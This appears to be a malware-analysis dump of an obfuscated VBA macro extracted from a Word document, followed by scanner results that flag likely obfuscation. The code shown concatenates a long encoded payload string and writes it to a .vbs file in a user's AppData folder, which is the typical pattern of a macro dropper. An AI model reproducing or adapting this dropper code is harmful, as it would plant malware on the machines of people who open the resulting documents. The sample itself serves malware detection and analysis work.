    str = str & "owbFpSRmZUclFsVjhhbXlZaFdHWFho"
    str = str & "Vl14MU9keGZtMltKYmVXRThhRkMyYW"
    str = str & "pGWXBIVnZNeFNFcmJGVjRvV3lWcFJG"
    str = str & "WG05VmJzMVdWVnlsb1hSYlRYbGdVNV"
    str = str & "MwYWd0V1h4R3lWVmJsdVZkZUpaVldX"
    str = str & "UXZtWFxwUWpZRkFXczYyeVtwVmpsRV"
    str = str & "daZF1GUkRKWVVYazNhWlRrV1JGYTQ0"
    str = str & "bGZWcDJraVZOWkFWRTFkWmZrM1ZwYk"
    str = str & "ZXbUhTRXYyV1J4VTIwbVpWRlFtVVZk"
    str = str & "U1hDVWhUUlJta1toVW5IVkFZeGZHWV"
    str = str & "FKTTZXbFVRZHZsS1BkVjZMaldNaFZr"
    str = str & "RVUxYVEwVzhVcH1Wa0c5TlJYRlFWQm"
    str = str & "VqaFtwYmRVRWhaRXIyU114VmJ2bk5W"
    str = str & "aEFHV2U5ZEpHMVRWVjZWWlZoYUl6bF"
    str = str & "tWcEluV1twTWJWRERkVnVGd214VWVv"
    str = str & "RTViRldueFFZUTJPVlVXQlJIaGZOYk"
    str = str & "RZRmZlZERVTFhCYlZXekJiWnFWa2Va"
    str = str & "WVB6a3RSZFpGRlZwYUp3VlhUaFdHV1"
    str = str & "hoUlR0MWRWSjZqWVhCUlhpR2hkUkVX"
    str = str & "WmtaVGp6a0ZhTlVueVswV2VPMjpWSn"
    str = str & "1sVEtOVWpHbF9kSmZqcFxwUmpha1hU"
    str = str & "VkRtS1hwVlBvVXdSZF1WRkdOZURGa2"
    str = str & "NZaD1uVktwV2l3RlBXdDUyeFZwTVZO"
    str = str & "bUZXUllWb1tkWWpUVl5WSkdueFFRYj"
    str = str & "pha1NWOTJHU2dsTl5GMkdjWkkxWF5o"
    str = str & "TWhaWGlUSldtU1J4VjBYRXhidGRHeW"
    str = str & "ZZTkhHV3hUSlZFTl5SV2RHMWFkdGdX"
    str = str & "elJoVjhpRmJaTndGT1VaWlY2VEdiWl"
    str = str & "NEeGdFYUprVVhZNU1rakt0UmpxbFNk"
    str = str & "NVRXWF5CYmhYWGdTRkEyU1J0Vjo1MU"
    str = str & "lSUmJsSFdSV0pTa1hWSmFrVmhOYUp0"
    str = str & "bEthWmlrWFd4TVJXVERNWnIxb2pOVW"
    str = str & "hYV3ViTldueFJNVDBHbXZWcDExbGZw"
    str = str & "YUZHbUplRkZqdlNSVjpWalJWMXYwV1"
    str = str & "xSVmQzR3RiTlFFV2ZSVkZhbFlZUldH"
    str = str & "V1tkVW14MUBWMTZtWFNCYTxTR2dhcE"
    str = str & "NsT2ZaWlpha1dhZFVYSFJKVjR3bXJW"
    str = str & "WT1rV0hkZUpYbFNSaElrcVVaYlZTSE"
    str = str & "NiUnQyMGZkV1hYbXhlaGRsdVFOVjZz"
    str = str & "ekdZb3ZFV1xwUWV6MkRVMTUyeVZaTV"
    str = str & "RXbXdXWlJGV1xSWWhYR2JiVlNuV1Fs"
    str = str & "UzAxVzlWVlZUTlZSZEZyMVtWWmpWaF"
    str = str & "NoVjhhRmdjSkdHT1toV2w0bGxSWmRG"
    str = str & "dGZaVlZ3Vl9UaGJtaVtsVGl5RlplMX"
    str = str & "ZtM1ZGV0ppbFdXVkRHYWpGVm0xMkhh"
    str = str & "bFVIdGZKV0JTa1NXbDZsWFc5Wkl3Vl"
    str = str & "9WZGZsT1dSV0hVWGdWNUVFd20wVm"
    VVV = str
End Function

Sub savefile(XX)
Dim filePath As String
filePath = "C:\Users\WinUline\AppData\code.vbs"
Dim fso As Object
Set fso = CreateObject("Scripting.FileSystemObject")
Dim oFile As Object
Set oFile = fso.CreateTextFile(filePath)
oFile.WriteLine XX
oFile.Close
End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 48640 bytes
SHA-256: a9730be018470d5e55c79fedf22550bd2138f95e955d6a41c183959dc3aa6a8f
Detection
ClamAV: No threats found
Obfuscation or payload: likely
1004 of 1300 identifiers look randomly generated (e.g. 'RXMWZkdFpXWF1SUmBhWHhTVkJtS11w') — consistent with name-mangling obfuscation.